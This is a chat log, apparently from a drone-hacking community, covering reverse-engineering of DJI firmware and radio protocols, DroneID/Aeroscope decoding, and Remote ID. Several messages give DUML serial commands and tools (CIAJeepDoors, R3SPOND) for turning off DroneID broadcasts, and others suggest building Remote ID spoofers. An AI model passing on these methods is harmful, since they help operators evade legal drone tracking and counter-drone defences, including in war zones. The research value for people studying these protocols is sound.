Bootrom (executes on AP) loads loader.bin, loader.bin then loads cp.bin and ap.bin and runs both.
[2022-05-20 16:32:19]
tmbinc :
loader.bin determines mp_state etc. and derives a few keys and so on but nothing of that is important
[2022-05-20 16:32:24]
tmbinc :
(for understanding)
[2022-05-20 16:32:46]
tmbinc :
AP is "relatively" simple, also thanks to the strings etc. in it
[2022-05-20 16:32:49]
peteair :
ok and as there's no further encryption done by loader / boot, analyzing directly ap / cp images should be enough right ?
[2022-05-20 16:33:09]
tmbinc :
if you have decrypted CP+AP then yes that's it
[2022-05-20 16:33:12]
peteair :
ok I've just directly looked at CP for the moment but thanks for the hint :D
[2022-05-20 16:33:19]
tmbinc :
keep in mind to expand the compressed data section if you care
[2022-05-20 16:33:40]
peteair :
hm ok. not there yes I guess
[2022-05-20 16:33:45]
tmbinc :
CP is insanely difficult to understand (for me, at least) unless you know the rough structure of how the RF protocol is implemented
[2022-05-20 16:34:07]
tmbinc :
especially because it has no strings, only these tracepoints
[2022-05-20 16:34:14]
peteair :
that's the idea :D I followed your common work on ocusync reverse with attention and I've got some experience with OFDM and LTE
[2022-05-20 16:34:28]
peteair :
I hope to be able to understand a few things but yeah I guess that's not so simple
[2022-05-20 16:34:50]
peteair :
my first idea was to start from interesting strings in CP like RSRP eg. that makes sense
[2022-05-20 16:35:02]
peteair :
and see where it's used
[2022-05-20 16:38:16]
tmbinc :
That works but the issue is that CP has so few strings due to memory pressure
[2022-05-20 16:38:32]
tmbinc :
Back on LC1860 some of the log items were still strings
[2022-05-20 16:38:38]
tmbinc :
But by now everything is only IDs
[2022-05-20 16:38:43]
peteair :
hm ok
[2022-05-20 16:40:51]
peteair :
ok thanks for that :+1: I'll look at it and keep you posted
[2022-05-20 16:43:08]
joonas :
P1 CP has a lot of strings, maybe that's a better target?
[2022-05-20 16:45:35]
peteair :
hi @joonas ! I've seen some of your messages as well on that topic, thx for your contribution :D
[2022-05-20 16:45:51]
peteair :
I thought that on P1 the RF work was done on external DSP ?
[2022-05-20 16:46:03]
joonas :
ah, yes, i think you're right
[2022-05-20 16:46:06]
peteair :
and so not "everything" is in the same image
[2022-05-20 16:46:23]
joonas :
i know jack shit about OFDM / LTE so i'm following with extreme interest :)
[2022-05-20 16:46:30]
peteair :
ahaha I guess
[2022-05-20 16:47:09]
peteair :
and so do both of you have any good sources / references about ARM reversing ?
[2022-05-20 16:47:42]
peteair :
i've done a few x86 reversing before but that's definitely not my forte
[2022-05-20 16:49:13]
joonas :
i open ghidra and then make like a monkey with a typewriter and then maybe 6 months later something comes out. mostly i just pester tmbinc.
[2022-05-20 16:49:50]
joonas :
so if you find anything good, send it over to me too :)
[2022-05-20 16:51:35]
bri3d :
if you haven't already seen it, the best thing you need to know to start is that the images have their base load address defined - it's in the ini file associated with the bin. basically load em up at the correct address and start plugging away in ghidra
[2022-05-20 16:52:13]
peteair :
yep ! understood that in the IM*H header and done that
[2022-05-20 16:52:19]
peteair :
but that was only the easy part :D
[2022-05-20 16:52:45]
peteair :
ahaha I'll try the monkey way and keep you updated
[2022-05-20 16:54:50]
bri3d :
I just do the monkey way. My big tip is label _everything_
[2022-05-20 16:55:02]
bri3d :
if you see an access to a memory address and you think you _might_ have an inkling what it does, label it right away
[2022-05-20 16:55:08]
bri3d :
then when you see it somewhere else, you can refine your label
[2022-05-20 16:55:13]
bri3d :
and eventually you understand what is going on
[2022-05-20 16:56:10]
peteair :
good tip thx !
[2022-05-22 09:13:44]
jack117wb :
jack117wb joined the channel.
[2022-05-22 12:08:04]
peteair :
Very interesting article about different DJI RF architecture: https://www.google.com/amp/s/www.suasnews.com/2022/05/the-dji-p1-and-s1-fpv-chipset-its-not-all-that/
[2022-05-22 12:09:41]
peteair :
Is Ian Lewis someone from here ?
[2022-05-22 12:10:17]
joonas :
this largely comes down to our own @tmbinc's work and what's filtered through the fpv community (myself included) up to Ian.
[2022-05-22 12:10:52]
joonas :
Ian is @mad_angler1 on here.
[2022-05-22 12:17:39]
peteair :
:+1: thanks
[2022-05-22 21:46:22]
jjbyrnes29 :
https://youtu.be/4LSD9PTN6Zg
[2022-05-22 21:46:54]
jjbyrnes29 :
Interesting video here, had a thought that you guys might want to test
[2022-05-22 21:48:30]
jjbyrnes29 :
In the video, the guy keeps mentioning a communication packet being sent on a specific frequency regardless of the channel being selected, possibly for testing of communication issues
[2022-05-22 21:48:51]
jjbyrnes29 :
What if aeroscope's drone ID also resides on that packet being sent out?
[2022-05-22 21:50:21]
jjbyrnes29 :
That would make sense a bit if true, as the controller could verify the UUID in the packet to make sure it's talking to the correct drone, and aeroscope would just passively listen on that frequency
[2022-05-22 21:50:52]
jjbyrnes29 :
Someone needs to test this, I don't have an oscilloscope handy and my Mini 2 is well...gone.
[2022-05-22 21:51:28]
joonas :
the fpv system doesn't show up on aeroscope.
[2022-05-22 21:52:36]
joonas :
if you go back above in this chat all aeroscope related packets have been documented already in one form or another afaik.
[2022-05-22 21:57:12]
jjbyrnes29 :
You sure about that @joonas?
[2022-05-22 21:58:23]
joonas :
DJI FPV = the DJI FPV drone, DJI FPV System = what Ian is analyzing, it's using the DJI FPV Air Unit along with the FPV Goggles on custom built quads.
[2022-05-22 21:59:03]
joonas :
https://www.dji.com/ee/fpv
[2022-05-22 22:05:14]
jjbyrnes29 :
Ah my bad
[2022-05-22 22:06:55]
jjbyrnes29 :
I'll add an SDR to the list of things to buy, ideally I'd like to contribute, not sure when I can
[2022-05-23 09:20:42]
hezerlight :
hezerlight joined the channel.
[2022-05-23 11:56:43]
bod :
bodopo joined the channel.
[2022-05-24 18:43:16]
devdriver :
devdriver joined the channel.
[2022-05-25 13:51:00]
squeck :
squeck joined the channel.
[2022-05-25 15:11:15]
h_marshall :
Hey everyone
I have a problem with Parrot's implementation of drone id; I've described it in more detail in general chat
https://dji-rev.com/dji-rev/pl/8pd9i65633gzfrmcdh5wqat7ue
@hostile advised me to discuss it here and asked for a firmware image.
I don't have any image currently; firmware updates happen through the mobile app and I didn't find any images to download from the web.
I know that Parrot has an SDK and I found a list of open source modules used in the firmware.
SDK: https://github.com/Parrot-Developers/groundsdk-android
Anafi firmware: https://github.com/parrot-opensource/anafi-opensource
SkyController 3 (RC) firmware: https://github.com/parrot-opensource/skycontroller3-opensource
I also figured out that it is possible to connect to the drone and RC via ADB and there should be some config files like /data/lib/mppd/mapping_anafi4k.cfg for the RC where you can change some parameters
https://parrotpilots.com/threads/skycontroller-3-mod-for-smoother-motion.4176/
Would appreciate any help or advice
[2022-05-25 15:14:57]
hostile :
install kismet for us, take a capture
[2022-05-25 15:15:14]
hostile :
last I checked they did nothing special with their normal wifi, let's look there first. then we can look for some weird out of band shit.
[2022-05-25 15:15:37]
hostile :
older parrot products detected just fine with kismet
[2022-05-25 15:21:10]
h_marshall :
ok, will do and get back to you with results
[2022-05-25 19:39:08]
atlantic :
yes parrot has eu drone id, just in the management beacon. if you disable it via the app, it only transmits your serial number iirc.
[2022-05-25 19:40:45]
atlantic :
just put your wifi card in monitor mode and put wireshark on it, filter the beacons and look for those vendor specific tags. there is a parrot tag and a eu drone id tag.
[2022-05-25 19:41:35]
atlantic :
i assume that is how most drones will work if they are compliant with eu law.
[2022-05-25 21:43:51]
dreamer :
dreamer joined the channel.
[2022-05-28 09:27:33]
batko001 :
batko001 joined the channel.
[2022-05-28 23:50:42]
jcga :
jcga joined the channel.
[2022-05-31 08:04:19]
theufodroner :
theufodroner joined the channel.
[2022-05-31 14:45:57]
hostile :
I wish we could get to this point. That we had a standard kit, and a backend to report from trusted users.
[2022-05-31 14:46:08]
hostile :
[2022-05-31 22:36:12]
hotelzululima :
problem is the freq.. adsb was on a freq that is easily monitored by a $10 RTL which doesn't operate at 2.4ghz..
[2022-05-31 23:45:10]
hostile :
hackrf or similar reception for *some* would be enough to get a community up. even any other reasonably priced SDR.
[2022-06-01 01:05:01]
dkovar :
Once RemoteID comes out, I suspect all of the ADSB based services will track drones as well.
[2022-06-01 04:21:18]
jezzab :
0x0102
[2022-06-01 11:43:57]
fredmicrowave :
Yes, 2.4ghz is very common and antennas even easier to get than those for 1090mhz .
[2022-06-01 19:15:30]
dragorn :
However 2.4ghz SDRs are not.
[2022-06-01 19:15:59]
dragorn :
Conceivably someone could make a frequency converter if it's done with non-wifi/non-bt data
[2022-06-01 19:16:23]
dragorn :
like the ham-it-up upverters to bring LF up into cheap rtlsdr territory
[2022-06-01 19:51:12]
superlogical :
https://www.crowdsupply.com/cariboulabs/cariboulite-rpi-hat
[2022-06-01 19:53:55]
superlogical :
Sadly sampling rate too low
[2022-06-02 16:10:50]
fredmicrowave :
I thought they were more common... But HackRF One can be found from ~110 USD
[2022-06-03 09:07:16]
oxolot :
oxolot joined the channel.
[2022-06-03 19:49:35]
shiftag :
shiftag joined the channel.
[2022-06-05 16:22:30]
laen :
laen joined the channel.
[2022-06-06 14:30:37]
dragorn :
I'd counter argue that I've had a caribou on order since they were announced and no sign of them shipping so that's not exactly available... and a "hackrf" at $120 has got to be a clone model which has some historic awfulness in the components which seriously impact the rf quality. (the "hackrf blue" stuff is really awful quality because they swapped a ton of components for cheaper models when they took the design)
[2022-06-07 17:46:24]
hotelzululima :
thing is.. what drove ADSB network interception adoption was the cheap and widespread availability of a DVB-T USB receiver that could be repurposed as a rx SDR covering ADS-B, we don't have that factor here
[2022-06-07 21:41:06]
dkovar :
Remote ID, when it comes out, uses Bluetooth.
[2022-06-07 22:57:13]
dragorn :
Assuming it works on the basic announcement channels, that's fairly simple then - and cheap. The TI CC2540 series can do btle announcement sniffing for $10. The firmware is absolute trash, tho.
[2022-06-07 22:57:40]
dragorn :
BT classic on the other hand, or anything not on the basic announcement channels, is harder to do raw sniffing on
[2022-06-08 02:35:17]
cyberid10t :
id10t joined the channel.
[2022-06-08 18:09:39]
dragorn :
FWIW just got a status update on the caribou sdr; they just now got all the components, delivery maybe in october.
[2022-06-09 14:26:37]
retina :
Hi , I'm excited about Dji_Droneid. I have a DJI Aeroscope and a USRP B210. Furthermore, I want to test the Aeroscope by sending a DroneID burst using your code
[2022-06-09 14:27:53]
hostile :
@retina great news... https://github.com/proto17/dji_droneid/issues/5#issuecomment-1151186266
[2022-06-09 14:39:43]
retina :
Hi everyone, I'm excited about your fantastic work.
https://github.com/proto17/dji_droneid
:heart_eyes:
I have a USRP B210 & Mavic 2. Furthermore, I want to test the Dji_DroneID burst using that code. But I don't have a **Dji Mavic Mini to capture the signal**. Could you share the DroneID burst signal?
The Dji signal can be captured indoors, without receiving a GPS signal. :+1:
[2022-06-09 14:49:10]
hostile :
you can use the repo to generate frames...
[2022-06-09 14:49:44]
hostile :
https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m
[2022-06-09 14:49:44]
hostile :
https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/transmit/create_burst.m
[2022-06-10 09:56:31]
lazypilot :
lazypilot joined the channel.
[2022-06-10 12:07:53]
testuser00001 :
Hey all, thank you for the work you put in to this. I have a question — if drone id is enabled, does it broadcast the live remote location or just the identified RTH in addition to the drone location?
[2022-06-10 14:34:34]
testuser00001 :
I see in the aeroscope docs it just grabs the RTH but wanted to make sure
[2022-06-10 17:29:26]
tmbinc :
It broadcasts 3 locations - app location, rth location and uav location
[2022-06-13 08:43:21]
albertoe :
albertoe joined the channel.
[2022-06-13 19:37:38]
rrcoolh :
rrcoolh joined the channel.
[2022-06-14 22:09:09]
laen :
I'm assuming if you disable location services and data to the DJI app it will disable the controller location broadcast? Will the DJI FLY app force you to enable those services to start flying? I'd like to maintain cell/wifi connection on my phone during flying for messenger/chat purposes. Disabling those services seems to work with my testing with the DJI GO app - just wanna make sure I'm not missing anything before I grab a Mavic 3 and start using the DJI FLY app... like a GPS receiver embedded into the controller.
[2022-06-15 00:51:38]
fredmicrowave :
You can disable GPS and still fly: The app will show notifications, but won't force you.
M3 flies perfectly in airplane mode, with phone GPS disabled. Original remote has no GPS
Imo, cell should be OK, but app data disabled.
[2022-06-15 13:26:08]
retina :
Having trouble demodulating DJI DroneID frames
:thinking_face:
https://github.com/proto17/dji_droneid/issues/9
[2022-06-15 14:35:14]
hostile :
Interesting realities within. https://www.youtube.com/watch?app=desktop&v=SXwMJpPtxtM
[2022-06-15 15:05:41]
eddy :
Aeroscope :: Be careful with the DJI fly app on Android. I found that after deactivating the AS.
The application reactivates it after switching to the "Menu >> Safety >> Aeroscope" page.
(it is not necessary to change any parameter on this tab)
Change status from [00] to [5f] or even [ff].
[Tested with command:: comm_serialtalk.py comxy -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 06]
After deactivation of AS, the output is as follows::
55 13 04 03 03 0a 00 00 80 03 da 06 00 00 00 00 00 8d 1f
After opening the aeroscope tab on DJI fly apk [android]::
55 13 04 03 03 0a 00 00 80 03 da 06 00 5f 00 00 00 62 78
or::
55 13 04 03 03 0a 00 00 80 03 da 06 00 ff 00 00 00 5f da
----------------------------------
Aircraft: Mini 2
Aircraft firmware: 01.03.0000
RC firmware: 02.00.1101
apk version: 1.4.2
[2022-06-15 15:51:02]
hostile :
track specific versions...
[2022-06-15 15:51:24]
hostile :
DJI *IS* making changes. They hit the CIA Jeep Doors repo from their internal confluence weeks ago
[2022-06-15 15:51:34]
hostile :
times will change moving forward. the snapshot in time has been created.
[2022-06-15 20:36:41]
tmbinc :
Ah yes I was wondering why there is new Mini 2 firmware...
[2022-06-15 20:57:13]
oxolot :
Maybe there is a way to block access to that menu item?
[2022-06-16 07:07:49]
eddy :
So far, after my further testing, only this item seems to be problematic in my case. But you have to be careful.
[2022-06-16 09:55:21]
kvazdopil :
kvazdopil joined the channel.
[2022-06-16 16:05:37]
lazypilot :
so the cia jeep doors duml command "sticks" and survives restarts? i was going to add it to start_dji_system.sh :D
[2022-06-16 18:49:30]
laen :
Are you saying that the "Menu >> Safety >> Aeroscope" page only reactivates AS for *you*? Or that the "Menu >> Safety >> Aeroscope" page is the only instance where you find AS reactivating for everyone on 01.03.0000?
[2022-06-17 09:23:45]
eddy :
According to my findings, I have only encountered this one problem so far. I haven't tried newer versions of Dji-fly, they may behave differently. I welcome any feedback.
[2022-06-18 06:34:13]
nz-maori :
progress
[2022-06-18 06:35:58]
nz-maori :
april 01
[2022-06-18 11:55:26]
kinev1337 :
kinev1337 joined the channel.
[2022-06-19 08:19:46]
anzz :
7928833 joined the channel.
[2022-06-19 10:27:26]
nz-maori :
maybe a silly question, but I didn't find a solution here in the chat. I'm trying to test
CIAJD on my Air2s (FW 1690) with no success. Seems that I can't get a serial port to AC.
Installed Python3 but when I start CIAJD.py a cmd window pops up and closes immediately.
Is the Air2s compatible for this hack?
Any advice will be appreciated….
[2022-06-19 10:54:49]
joonas :
@nz-maori try --bulk instead of --port, i think the air2s might use the bulk usb interface instead of the serial interface
[2022-06-19 10:55:23]
joonas :
i think it's just --bulk, you don't need to specify the device, it should be auto detected
[2022-06-19 10:58:59]
nz-maori :
Thank you will give it a try
[2022-06-19 13:36:26]
laen :
On macOS you'll need to specify the device - but it shouldn't affect the immediate closing of the window issue you're having. If you can catch the text before the window closes that'd be helpful, sometimes I gotta smash printscreen to catch it at the right moment.
[2022-06-19 13:38:51]
joonas :
oh, sorry, i didn't read the messages properly. if you're just double clicking the icon then that would happen yeah. i think i need to specify the serial port on windows too. you should run ciajeepdoors.py via the terminal to get the output and set the proper options.
[2022-06-19 13:39:24]
joonas :
or alternatively just try this instead: https://r3spond.d3vl.com/
[2022-06-19 13:39:43]
joonas :
only works with usb serial based drones, not the newer ones that require a bulk connection.
[2022-06-19 13:40:02]
laen :
I just tested on windows too - the window will popup and close immediately if you don't run it from root directory of the OG tools - follow the instructions exactly.
[2022-06-19 14:09:25]
nz-maori :
@joonas thank you for this fast support, I've used the website above and it worked flawlessly ;-). I've noticed that
I have to release a specific port for the procedure. Maybe that was the fault when using CIAJD via cmd.
Now I need an Android Device as Fly App (IOS) is unusable…
[2022-06-19 16:35:59]
nz-maori :
Only for Feedback: tested DJI Fly App 1.4.8 (IOS) = DroneID is enabled again, Maven App 3.11.5 (IOS) = DroneID stays disabled
[2022-06-19 16:39:07]
joonas :
yeah all fly versions on ios do that (with ciajeepdoors too). that's why the page says ios is not compatible. i'll forward maven to the author so they can link it on the page.
[2022-06-19 19:17:01]
ttp499 :
ttp499 joined the channel.
[2022-06-20 19:56:32]
deniss-i979 :
deniss-i979 joined the channel.
[2022-06-20 20:51:29]
oxolot :
When I run py comm_serialtalk.py --bulk -a 2 -t 1000 -r 0300 -s 3 -i 218 -x 0b on M3, I get this huge continuous packet in response: `55 84 04 ae 03 0a 00 00 80 03 da 0b 00 05 1e f0 00 00 00 00 00 00
e6 07 06 13 10 2d 37 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38
e6 07 06 13 10 23 2d 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38
e6 07 06 13 10 13 19 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38
e6 07 06 13 10 11 25 13 31 35 30 33 34 36 32 32 31 33 32 35 37 32 36 34 38 6e a9` can someone explain what this is?
[2022-06-20 22:08:47]
tmbinc :
Command 0xDA, subcommand 0x0B is "get user ID", it returns up to 5 UUIDs (perhaps the last 5 used? Don't know.)
[2022-06-20 22:12:16]
tmbinc :
-x 08 should give you the current one, -x 07 with some more data lets you somehow set that
[2022-06-21 06:19:09]
oxolot :
-x 08 gives me this `55 10 04 56 03 0a 00 00 80 03 da 08 00 00 1a 3b` and -x 07 gives `55 0f 04 a2 03 0a 00 00 80 03 da 07 00 08 ea` which is not looking really similar (at least to me) with the result of -x 0b above, although it does look like a chain consisting of 5 repeats. BTW, how can I change anything at this location: 0xDA, subcommand 0x0B? I want to try to erase it in the drone.
[2022-06-22 09:00:45]
digitalshaman :
digitalshaman joined the channel.
[2022-06-22 16:00:33]
lurker :
what could be the issue with R3SPOND? Tried a lot, always get "Oops!
There's been an issue verifying your settings." on two PCs running Win10 with an old Mavic Pro 1? Thanks!
[2022-06-22 19:49:24]
fly4y :
fly4y joined the channel.
[2022-06-23 07:43:16]
joonas :
that implies when r3spond tried to read back the privacy bits it got an unexpected result. i.e. the privacy bits didn't stick.
[2022-06-23 07:43:55]
joonas :
interesting. the one device i helped test this with during dev was a mavic pro platinum.
[2022-06-23 07:44:28]
joonas :
@d3vl_jack is behind r3spond, maybe he can offer some further insights. i.e. where to check what was reported back exactly.
[2022-06-23 08:52:45]
lurker :
Yeah, does not work for me. MP1 on 1.03.700. It says connected but only when I select the com port from the list, not automatically. Tested with latest chrome. edge same. will dig into command line jeep doors this weekend..
[2022-06-23 09:39:36]
d3vl_jack :
Pretty much echoing what Joonas has said there; are you able to read the settings without setting any? Far right button
[2022-06-23 10:24:54]
heash :
heash joined the channel.
[2022-06-23 11:14:29]
fredmicrowave :
If I may add a (positive) comment: When I checked the R3spond page I noticed that no drone in the list was supported. Doubting it would support all the other non-listed ones, I did not really understand what its purpose was, and concluded it was an indirect promotion for Maven.
This is just sharing a superficial experience, if it can help.
[2022-06-23 11:18:20]
joonas :
good feedback. the reason for the non supported list is that those are the ones we know to require the newer usb bulk interface. everything older with the serial interface _should_ work (at least as well as it does with ciajeepdoors). Maven was actually only added a few days ago as we discovered it's a working solution for iOS. but the confusion is understandable. tagging @d3vl_jack so he sees this.
[2022-06-23 11:22:46]
d3vl_jack :
Something to revisit and clear up then, thanks for the feedback
[2022-06-23 11:28:10]
lurker :
no, could not read the settings either. Also says "Oops! There's been an issue verifying your settings."
[2022-06-23 11:28:49]
joonas :
anything in the javascript debug console?
[2022-06-23 11:39:04]
joonas :
i guess try with ciajeepdoors as well. they should operate exactly the same. maybe you have a weird firmware version.
[2022-06-23 12:31:50]
lurker :
JS console says
DevTools failed to load source map: Could not load content for
https://r3spond.d3vl.com/assets/css/bootstrap.min.js.map: HTTP error: status code 404,
net::ERR_HTTP_RESPONSE_CODE_FAILURE
[2022-06-23 13:34:14]
testuser00001 :
That’s not a problem, map isn’t needed for operation
[2022-06-24 06:23:30]
myidthefrog :
myidthefrog joined the channel.
[2022-06-24 14:43:05]
kostya2005 :
kostya2005 joined the channel.
[2022-06-24 20:37:40]
tmbinc :
Wow so they added Japan's RID for Mini2? Which is (according to https://members.wto.org/crnattachments/2021/TBT/JPN/21_4420_00_e.pdf) BT, BTLE or Wifi? To an existing device? Did they add coexistence to that device so S1 can be used for C2 and Wifi/BT for RID?
[2022-06-26 11:36:29]
eddy :
FYI - DJI mini3 has Remote ID activated by default. It's verified by me using "https://github.com/opendroneid/receiver-android"
Any idea what to do with that?
-------------------------------------------------------
Aircraft firmware: 01.00.0100
RC firmware: 01.00.0200
apk version: 1.6.1
more info:: https://www.youtube.com/watch?v=mE0YVdilcFI
[2022-06-26 20:29:49]
tissy :
Which country are you in @eddy ?
[2022-06-26 21:19:45]
eddy :
CE - Slovakia
[2022-06-26 22:10:40]
tissy :
Many thanks @eddy . I wasn’t sure if the remoteID transmission was country specific as I don’t think the Mini 3 transmits the new OpenID in the UK. Will need to test again tomorrow.
[2022-06-26 22:19:50]
eddy :
I do not own Mavic 3, but according to info from Czech republic, Remote ID is supposedly functional there.
[2022-06-26 22:56:15]
tissy :
Ahh, I thought you were confirming it does transmit as per your first post.
[2022-06-27 06:07:34]
eddy :
We probably don't understand. I confirm Remote ID on my Mini3 pro. But I can't confirm Remote ID on Mavic 3 because I don't own it. Maybe my mistake, I thought you were asking about Mavic 3. Misunderstanding from my side ;)
[2022-06-27 20:30:58]
jjelo :
jjelo joined the channel.
[2022-06-28 12:21:38]
docsasha :
docsasha joined the channel.
[2022-06-30 17:38:55]
zorast :
zorast joined the channel.
[2022-06-30 21:06:12]
tissy :
Has anyone considered / tried (is it even possible) to use CIAJeepDoors on an MCU running microPython for a portable deployment option please?
[2022-06-30 21:15:58]
testuser00001 :
I know it is running on MCU now, check the repo -- there is an issue detailing the use cases
[2022-06-30 21:44:48]
tissy :
Just checked the repo and can't see anything regarding it running on an MCU. Can you direct me please?
[2022-06-30 22:17:05]
testuser00001 :
My bad I thought there was but looks like there isn’t. Plugging it into the drone and duct taping then resending duml periodically is always an option though ?
[2022-07-01 00:37:29]
hostile :
@tissy yes. they call this an "Olga" in the Ukraine.
[2022-07-01 09:46:15]
eddy :
Hi @tissy, I'm curious about the UK test result.
[2022-07-01 14:05:25]
tissy :
Hi @eddy. Unfortunately no detection on the app. It was tested against a Mavic Mini 3 Pro running latest firmware (aircraft 01.000.0201, controller app 1.6.8).
At the moment, there is no legal requirement in the UK for RemoteID. Therefore perhaps on DJI aircraft, it is only broadcast in regions where there is a legal requirement (based on the aircraft’s GPS perhaps).
[2022-07-01 14:14:20]
eddy :
Thanks @tissy for the feedback. Yes, it can be geo-sensitive. However, we also do not have a legal requirement for RID in our country. It is interesting ..
[2022-07-01 14:29:58]
yaros :
yaros joined the channel.
[2022-07-02 19:15:05]
laen :
Anyone using the "--bulk" option on CIAJD? I have no issues with the serial option but switching to bulk for a DJI Mini 2 it appears I'm having pyserial backend issues - the open_usb(po) in comm_serialtalk.py line 151 isn't picking up a backend and it eventually exits at line 183. Anyone that can throw me a bone? - I'm using libusb0.dll with no issues for serial connections.
[2022-07-02 19:31:19]
deniss-i979 :
Try connecting DJI Assistant to the drone; after connecting, close Assistant and work with the serial option on CIAJD
[2022-07-03 10:40:24]
smart_beanz :
smart_beanz joined the channel.
[2022-07-06 09:19:37]
oxolot :
DJI Mini 2 uses COM
[2022-07-06 14:33:32]
dreamer :
hello, what software and hardware do you use on your screen?
[2022-07-06 14:59:14]
eddy :
Hi @dreamer, it is mentioned in the post. It's "https://github.com/opendroneid/receiver-android"
Use android studio to create the build.
.. and for example Galaxy s10 lite is working ..
[2022-07-07 09:15:24]
n1ptune :
n1ptune joined the channel.
[2022-07-07 22:52:20]
hito_no_yume :
yutasyutas joined the channel.
[2022-07-08 03:51:43]
markisunsure :
markisunsure joined the channel.
[2022-07-09 05:11:02]
ababak1990 :
ababak1990 joined the channel.
[2022-07-09 09:32:21]
mitar111 :
mitar111 joined the channel.
[2022-07-11 07:37:44]
boris.plintovic :
I read that the Aeroscope G-8 and G-16 work in the 2400-2500 and 5700-5850 bands. MavicPro/Platinum can be operated at frequencies 2.3 and 2.5 using jkson_fcc_mod. Does it mean we can escape Aeroscope's eyes?
[2022-07-11 08:09:36]
enigma2 :
I guess :
in WiFi mode-> detection is possible by IE tag anyway
in RF(ocusync) mode-> OC droneid channels are constant and won't change - just hopping among some 2.4 GHz predetermined channels. so detection is possible again
[2022-07-13 01:34:42]
enk2022 :
enk2022 joined the channel.
[2022-07-13 04:04:48]
enk2022 :
I heard from some people that the controller is actually transmitting its serial number. Anyone knows if this is true? and can you see this in AeroScope?
[2022-07-13 10:22:10]
enigma2 :
NOT the controller. It's the UAV transmitting the flight controller serial number
[2022-07-15 11:13:39]
jim9000 :
jim9000 joined the channel.
[2022-07-15 15:06:14]
xou :
xou joined the channel.
[2022-07-17 18:40:38]
nz-maori :
@joonas I've checked Dronelink App (Android 3.4.1) today.
Drone ID stays disabled!
[2022-07-18 15:44:31]
dfessence :
dfessence joined the channel.
[2022-07-19 07:22:24]
edward_tlt :
edward_tlt joined the channel.
[2022-07-19 13:01:18]
cedivad :
cedivad joined the channel.
[2022-07-19 20:00:56]
faineg :
Per request from @hostile , here's some stuff I recently dug up on Telegram regarding Aeroscope use on the battlefield in Ukraine... https://twitter.com/faineg/status/1549477499024842753
[2022-07-19 20:01:21]
faineg :
https://twitter.com/faineg/status/1549474619282833408
[2022-07-19 20:01:38]
faineg :
https://twitter.com/faineg/status/1549469626366582784
[2022-07-19 20:01:46]
faineg :
https://twitter.com/faineg/status/1549467347970400264
[2022-07-21 13:01:00]
laen :
Good stuff Faine, just to understand the context - is this survival advice sourced from Russians To Russian DJI operators? I.e so Russians can evade Ukrainian drones with their own Mavics; or is it more so a PSA for Russians on how Ukrainian forces are evading detection ?
[2022-07-21 13:53:54]
dkovar :
Russians are using the same capabilities to evade Ukrainian CUAS as the Ukrainians use to evade Russian CUAS. The exploits are out there for anyone to use.
[2022-07-21 15:07:58]
azerbaijan :
I think you have much better opinion about Russians, they really are.
[2022-07-23 13:48:44]
dronelabdk :
dronelabdk joined the channel.
[2022-07-26 15:32:44]
shuke :
How do I enable FCC mode on the DJI Phantom 3?
[2022-07-27 12:19:18]
sups :
sups joined the channel.
[2022-07-27 14:00:00]
hostile :
And to complement what @dkovar said. DJI has also obviously been pushing out firmware that no longer accepts DUML to disable DroneID. The Mavic M3 GPS fix firmware is known to be this way for example
[2022-07-27 14:21:43]
stanlee :
Interesting - introduce a massive bug that shouldn't be there. Then wait until people are dying for a fix...then make restrictions part of the "fix".
[2022-07-27 20:57:37]
viiince :
viiince joined the channel.
[2022-07-27 21:27:04]
fredmicrowave :
They never announced in their firmware update info that they removed the ability to disable droneid .
[2022-07-27 23:32:11]
stanlee :
They never announce anything in their updates when they do sneaky shit. Usually “optimized performance” or some garbage like that.
[2022-07-28 01:27:22]
fredmicrowave :
DJI could be great if it was not for this kind of behavior and the lack of transparency they have got us used to. Anyway, removing features from a purchased item without informing the user must be illegal...
[2022-07-28 06:50:55]
anesta :
anesta joined the channel.
[2022-07-28 07:07:56]
oxolot :
Any idea how this block is implemented and how to circumvent?
[2022-07-29 04:17:29]
stanlee :
“Illegal”? Doubtful. It’s not criminal for them to tighten up restrictions. It’s sheisty, sort of unethical, and duplicitous. But not “illegal”.
[2022-07-30 15:52:52]
matsan :
matsan joined the channel.
[2022-08-01 18:04:29]
enk2022 :
Decoding the DroneID packet, how do you know the drone model? I played with mini 2 packets and i searched for ascii to see "mini" anywhere and i didn't find anything. Am i missing something?
[2022-08-01 19:06:52]
tmbinc :
Serial number I think?
[2022-08-01 19:17:02]
dmitry :
dmitry joined the channel.
[2022-08-01 22:09:32]
tissy :
Look for the product type. Mavic Mini is product type “35”, Mini SE is “46” & Mini 2 is “3F”.
[2022-08-01 22:22:27]
fredmicrowave :
@enk2022 This may help :
https://www.dji-rev.com/dji-rev/pl/jf8idgzzff8cpqcts1zhehipac
[2022-08-02 00:47:20]
nopexecutor :
I think byte 67? (at least in my counting...) had model id
[2022-08-02 00:47:28]
nopexecutor :
{0x10, "Mavic Pro"},
{0x24, "Phantom 4 Pro V2"},
{0x29, "FPV"},
{0x3A, "Mavic Air 2"},
{0x3F, "Mavic Mini 2"}
[2022-08-02 00:47:33]
nopexecutor :
sth. like that
[2022-08-03 12:53:20]
xakep :
xakep joined the channel.
[2022-08-04 18:57:25]
nz-maori :
Maybe a silly question, if I disable DroneID with CIAJD will the RC Pro enable it again?
[2022-08-08 10:21:53]
mib_imperator :
mib_imperator joined the channel.
[2022-08-08 14:59:18]
hostile :
If someone is bored... could probably write a module for Flipper Dev board to spoof out the base Wifi packets for RemoteID. (obviously won't be 1/4 rate, but Aeroscope doesn't care). https://shop.flipperzero.one/collections/flipper-zero-accessories/products/wifi-devboard
[2022-08-10 13:51:01]
hostile :
these are perfect for Throwies.
[2022-08-10 13:51:02]
hostile :
https://www.suasnews.com/2022/08/ardupilot-remoteid-support/
[2022-08-10 13:51:09]
hostile :
can easily be repurposed into spoofers
[2022-08-10 23:23:07]
enk2022 :
How does the drone id look like in Lightbridge DL?
[2022-08-11 02:21:40]
hito_no_yume :
https://viewpoints.dji.com/blog/how-djis-aeroscope-system-protects-the-public-interest
[2022-08-11 02:26:25]
hito_no_yume :
"Unlike almost all other DJI drone data, the AeroScope signal is unencrypted by design, since it is meant to be easily processed by a receiver that may not be nearby. **And while it is not encrypted, it is protected by a proprietary signal protocol that is not easily understood**."
